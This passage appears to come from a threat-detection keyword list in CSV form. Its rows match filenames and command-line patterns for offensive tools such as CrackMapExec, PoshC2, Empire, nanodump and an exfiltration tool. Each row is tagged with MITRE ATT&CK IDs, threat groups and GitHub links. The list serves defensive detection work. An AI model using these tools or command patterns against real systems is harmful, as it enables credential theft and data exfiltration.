C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*Cr3dOv3r*,offensive_tool_keyword,Cr3dOv3r,Know the dangers of credential reuse attacks.,T1110 - T1555 - T1003,TA0006 - TA0040 - TA0003,N/A,N/A,Credential Access,https://github.com/D4Vinci/Cr3dOv3r,1,1,N/A,N/A,10,1902,437,2019-03-28T14:53:38Z,2017-11-13T20:49:57Z -*cracf2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crack_databases.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*crack_windows.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Crack-allDBs.git*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*Crack-allDBs-main*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*crack-allDBs-v1.py*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*crack-allDBs-v2.py*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cracklord-master.*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*cracklord-queued*_amd64.deb*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*cracklord-resourced*_amd64.deb*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*crackmapexec*,offensive_tool_keyword,crackmapexec,crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*CrackMapExec*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*crackmapexec.exe*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*crackmapexec.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*crackmapexec.py*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*crackmapexec.spec*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*crackpkcs12*,offensive_tool_keyword,crackpkcs12,A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu,T1110 - T1185 - T1114,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/crackpkcs12/crackpkcs12,1,1,N/A,N/A,2,118,26,2019-04-26T18:38:11Z,2015-03-19T22:26:17Z -*crackTGS*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,0,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*Crassus.csproj*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*Crassus.exe*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*Crassus.sln*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,0,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -"*crate::modules::{rec2mastodon,rec2virustotal}*",offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*CravateRouge/autobloody*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*CravateRouge/bloodyAD*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/bloodyAD,1,1,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*crawlLdrDllList*,offensive_tool_keyword,cobaltstrike,CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectEtwBypass,1,1,N/A,10,10,253,54,2021-09-28T19:09:38Z,2021-09-21T23:06:42Z -*crde dns -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*crde https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*crde::utils::checker*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*crde_x64.exe dns -f *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*crde_x64.exe https -f *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*CREATE DATABASE C2;*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*create_dummy_dll_file*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*create_protected_process_as_user*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*create-aws-instance.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*CreateC2Dialog.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*CreateC2Server*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*createdaisypayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*createlinuxpayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Create-MultipleSessions.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Create-NamedPipe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*createnewpayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*createnewshellcode*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*createpbindpayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*CreateProcessAsUser*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*createproxypayload -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*createproxypayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Create-SuspendedWinLogon*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Create-WinLogonProcess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*credBandit * output*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,0,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*credBandit.*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 